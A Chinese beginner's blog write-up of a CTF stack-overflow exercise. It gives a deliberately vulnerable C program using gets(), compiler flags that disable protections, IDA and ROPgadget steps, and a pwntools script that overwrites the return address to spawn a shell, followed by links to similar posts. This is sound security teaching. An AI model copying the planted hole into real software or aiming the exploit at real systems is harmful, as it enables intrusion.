第一道pwn栈溢出题

最新推荐文章于 2024-06-28 17:00:42 发布
最新推荐文章于 2024-06-28 17:00:42 发布
阅读量896 收藏 2
点赞数
分类专栏: pwn 文章标签: 安全 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74020775/article/details/129324578
版权
文章介绍了如何通过代码审计发现栈溢出漏洞,使用gcc编译器特定参数关闭保护机制,然后在IDA中分析栈结构。接着,作者展示了如何寻找返回地址,处理64位程序的栈对齐问题,并编写ROP攻击脚本来执行shell。文章还提到了相关工具如ROPgadget的使用和安装。
摘要由CSDN通过智能技术生成

代码和解题思路来自启明星辰的《ctf安全竞赛入门》,当然还有好多热心的师傅们的指导。

1.代码:

#include "stdio.h"
void shell()
{
    system("/bin/sh");
}
void vuln()
{
    printf("Please input your name:\n");
    char s[8];
    gets(s);
    printf("%s\n",s);
}
void main()
{
    printf("**Welcome to the simple pwn1**venus\n");
    vuln();
}

2.在虚拟机中使用gcc编译

****需要加参数

gcc  -fno-stack-protector  -z execstack  pwn1.c  -o pwn1 -no-pie

这里的pwn1.c是刚才代码的文件名字,pwn1是目标文件名字。

最后是用来关闭no-pie

编译过程中可能会有警告,不用管。

3.查看栈结构

然后放到ida里边。

找到vlun函数,可以在左侧点击。

发现s数组距离返回地址是8h然后就是ebp

在64位程序中,ebp是8个字节,32位是4个字节哈。

这样的话就可以写脚本了。

4.shell地址

因为咱们想获取中端嘛。就是shell的地址。

在ida查看:

5.栈对齐ret

因为64位程序要求栈对齐所以需要ret

ret是这样看的:

前提是要安装ROPgadget哈

6.写攻击脚本

from pwn import *  #导入pwntools包
p1=process('./pwn2')  #执行的文件
payload=b"a"*(0x10)+p64(0x401016)+p64(0x401146)    #第一个是垃圾数据,就是填充本来应该输入的数据(8个字节),然后覆盖掉ebp(8个字节),再然后写下ret指令,最后写入shell地址
p1.sendline(payload)
p1.interactive()

b“a”:

将a转换成二进制,要不然的话和后边的类型不同不能拼接。

p64():

因为用的是64位,所以是p64

如果是32位就是p32

将整数转换成二进制

第二个数据是ret,好像是64位的文件就要进行栈对齐。

最后一个是返回地址,写的是shell就会执行shell

关于ROPgadget的下在和简单使用参考这篇文章:

(2条消息) (Pwn)CTF工具 ROPgadget 的安装与使用介绍_ropgadget命令_半岛铁盒@的博客-CSDN博客

如果下载不了可以用github下就是第一个 python-capstone,其实在安装pwntools的时候有装过的,只是没有带python,然后就是如果软件下载不了就需要换下源,然后更新下。

实在不行,就在主机上通过github下载,然后解压,在粘贴到虚拟机里。

关于ret栈对齐的知识参考这篇文章

关于ubuntu18版本以上调用64位程序中的system函数的栈对齐问题 - ZikH26 - 博客园 (cnblogs.com)

y6y6y666
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
一道栈溢出pwntools及gdb的简单使用
qq_43474199的博客
09-25 1666
题目下载地址:https://pan.baidu.com/s/1RZtRKY89dzZjXlXVvbqFwA 密码:5wq0 好,让我们进入这道 首先,我们先运行一下这道不废话,直接checksec检查该程序。 可以看到,这道的保护信息,没有PIE也没有Stack上的金丝鸟,这个程序是64位。 我们拉入IDA看一眼 这是main函数的伪C代码: 可以看到,该程序我们输入1,2,3可以分别...
CTF PWN简单栈溢出
2301_81031055的博客
01-25 453
(mov esp,ebp)意思是先将ebp赋给esp,此时esp与ebp位于同一个地址,可以把它们现在指向的那个地址,既可以当成栈顶又可以当成是栈底。因为填充的数据后面跟的就是栈,所以它会将栈地址顺带打印出来,接下来我们继续编写脚本。到这里,我们的第一次输入就算完成了,在第二次输入的时候就能去构造payload。(此时栈顶的内容也就是ebp的内容,也就是说现在把ebp的内容赋给了esp)在这里我们发现有system函数,我们可以利用system函数的plt表。我们会发现溢出字节较少,考虑用栈溢出
pwn栈溢出10道练习有writeup
01-04
pwn栈溢出练习题目,每都有writeup.
pwn入门之栈溢出练习
dfdhxb995397的博客
09-10 925
本文原创作者:W1ngs,本文属i春秋原创奖励计划,未经许可禁止转载!前言:最近在入门pwn栈溢出,做了一下jarvisoj里的一些ctf pwn,感觉质量都很不错,难度循序渐进,把自己做的思路和心得记录了一下,希望能给入门pwn的朋友带来点帮助和启发,大牛轻喷题目链接:https://www.jarvisoj.com/challenges1、level0(64位)代码<ig...
PWN入门学习之简单的栈溢出
最新发布
2301_80718478的博客
06-28 652
栈溢出PWN的一种最简单的漏洞,其最核心的点就是,程序在读取用户输入的时候没有对输入内容进行检测与限制,从而导致输入的数据写入内存时挤占了其它不属于该变量的内存位置,从而导致重要寄存器(如RBP、RIP)中记录的地址被破坏,导致函数执行完返回时发生错误(找不到这样一个地址),即发生段错误(Segment fault)。但是同时,我们可以利用改写RBP、RIP寄存器值的这一特性,将程序跳转至我们期望的地方去。
pwn学习总结(三) —— 栈溢出经典型整理
qq_41988448的博客
11-19 2841
pwn学习总结(五) —— 经典题目整理一1. 栈溢出入门2. 字符串截取+缓冲区执行3. GOT泄露4. libc泄露5. 使用DynELF实现远程libc泄露 1. 栈溢出入门 平台:jarvisoj 题目:level0 靶机:nc pwn2.jarvisoj.com 9881 查看程序防护: 查看反汇编: exp: from pwn import * import pwn r = ...
pwn栈溢出基础练习——1
qq_41696518的博客
07-06 448
pwn练习
第一个PWN 栈溢出简单
qq_41696518的博客
06-16 1131
第一个pwn 栈溢出简单
SCTF2021 pwn gadget 出思路+预期非预期解
令则
01-19 1165
SCTF2021 pwn gadget 出思路+预期非预期解
BUUCTF PWN-堆总结 2021-09-27
m0_56897090的博客
09-27 2067
文章目录整体分析-2021-09-27新角度TcacheUAFFile结构体HourseOfForceUnlink经验新角度ciscn_2019_final_5分析EXPTCACHEhitcon_2018_children_tcache分析EXPUAFwustctf2020_easyfast分析EXPACTF_2019_babyheap分析EXPgyctf_2020_some_thing_interesting分析EXPbjdctf_2020_YDSneedGrirlfrien分析EXPciscn_2019
2021第十四届全国大学生信息安全竞赛WP(CISCN)-- pwn部分
热门推荐
lifanxin的博客
05-17 1万+
CISCN_2021_WP概述ciscn_2021_lonelywolf总结 概述   作为学习不到一年的练习生,今年第一次参加国赛,本以为题目会比较温柔,但是最后只做出了一道pwn,本来还有两道pwn是有机会的,但还是缺少一些知识或者技巧吧,没做出来,然后就结束了。本次国赛pwn出了一道arm 64位结构的,其余都是正常的linux下pwn,使用libc-2.27.so,有一道考了沙箱机制。 ciscn_2021_lonelywolf   ciscn_2021_lonelywolf   libc-
pwnnum22----栈溢出(c++)
tbsqigongzi的博客
04-25 1277
BUUCTF-PWN-pwn1_sctf_2016 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位程序,小端序 开启部分RELRO-----got表可写 未开启canary保护-----可能存在栈溢出 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 动态链接 ida一下看一下伪代码 主函数调用一个vuln()函数 和平常不一样,这次是c++代码 首先让我们输入一个字符串,发现函数fgets,但是该函数只读取0x20个字节,而s有0
pwnnum23----栈溢出
tbsqigongzi的博客
04-26 162
BUUCTF-PWN-jarvisoj_level0 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 64位程序,小端序 未开启RELRO-----got表可写 未开启canary保护-----可能存在栈溢出 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 动态链接 ida一下 程序首先用write函数输出了一个Hello,World,又调用了一个函数 明显的栈溢出,buf占0x80字节,而read函数要读取0x200字节,可以覆盖返回地址
pwnnum19----栈溢出
tbsqigongzi的博客
04-24 481
BUUCTF-PWN-rip 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 64位程序,小端序 开启部分RELRO-----got表可写 未开启NX保护-----堆栈可执行 未开启PIE-----程序地址为真实地址 RWX----有可读可写可执行段 动态链接 ida一下,看一下主函数 这里的gets(&s, argv); gets第一个参数是要输出的字符串首地址,第二个参数是输出的字符串的长度 s占0xf个字节,这里argv的值是未知的,但这个程序能利用的也只
pwnnum20----栈溢出
tbsqigongzi的博客
04-25 172
BUUCTF-PWN-warmup_csaw_2016 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 64位程序,小端序 开启部分RELRO-----got表可写 未开启canary保护-----可能存在栈溢出 未开启NX保护-----堆栈可执行 未开启PIE-----程序地址为真实地址 RWX----有可读可写可执行段 动态链接 程序运行后告诉我们一个地址0x40060d ida一下看一下伪代码 主函数里有一个sprintf注意一下 sprintf(&s, "%
pwn栈溢出基础练习——2
qq_41696518的博客
07-06 330
pwn栈溢出练习,所有题目在练习——1中
pwnnum1---栈溢出
tbsqigongzi的博客
04-21 1552
攻防世界pwn新手区—level0 111.200.241.244:49418是ip地址:端口,通过linux的nc命令可扫描ip地址并连接到ip地址对应靶机的端口程序上 linux的nc命令 附件是把靶机的程序直接给出到本地 下载题目附件后首先赋予程序执行权限 一般下载的程序没有可执行权限,无法进行分析,所以要先赋予可执行权限,命令是 chmod +x 文件名 linux文件属性 之后用checksec命令查保护(需先配置pwntools这里引用另一个博主的配置pwn环境的博客) 关于linux的保
一道简单的访问越界、栈溢出pwn记录
qq_39153421的博客
03-16 709
检查题目 checksec保护都没开,降低了难度。64位程序,ida查看代码: ManageBook *v3; // rbx char buf[24]; // [rsp+0h] [rbp-30h] BYREF ManageBook *v6; // [rsp+18h] [rbp-18h] setvbuf(stdout, 0LL, 2, 0LL); setvbuf(stdin, 0LL, 1, 0LL); puts("your name:"); read(0, buf, 0x100u
ctfshow PWN 栈溢出
08-23
在ctfshow PWN中,栈溢出是一种常见的攻击方式。 根据提供的引用,我了解到栈溢出是一种通过向程序输入过长的数据导致数据溢出栈的一种攻击手段。栈是一种数据结构,用于存储程序的局部变量和函数调用的返回地址等...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

y6y6y666

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值